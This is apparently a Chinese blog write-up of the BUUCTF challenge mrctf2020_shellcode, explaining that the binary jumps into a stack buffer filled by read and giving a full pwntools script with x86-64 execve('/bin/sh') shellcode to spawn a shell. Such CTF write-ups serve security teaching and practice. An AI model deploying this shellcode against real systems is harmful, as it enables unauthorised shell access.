BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

python 复制代码
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()
相关推荐
小小码农Come on几秒前
QT开发环境安装
开发语言·qt
云深处@3 分钟前
【C++】哈希表
开发语言·c++
weixin_452159556 分钟前
模板编译期条件分支
开发语言·c++·算法
guygg886 分钟前
傅立叶光学的Matlab实现方法
开发语言·matlab
啊我不会诶7 分钟前
蓝桥杯练习 混乱的数组
c++·蓝桥杯
码农六六9 分钟前
js函数柯里化
开发语言·前端·javascript
2501_9411481510 分钟前
C++ map / multimap 保姆级教程
java·开发语言·c++
GHL28427109015 分钟前
TeamTalk-msg_server学习
运维·服务器·c++·学习
ʚB҉L҉A҉C҉K҉.҉基҉德҉^҉大19 分钟前
C++中的策略模式进阶
开发语言·c++·算法
xb113225 分钟前
C#串口通信
开发语言·c#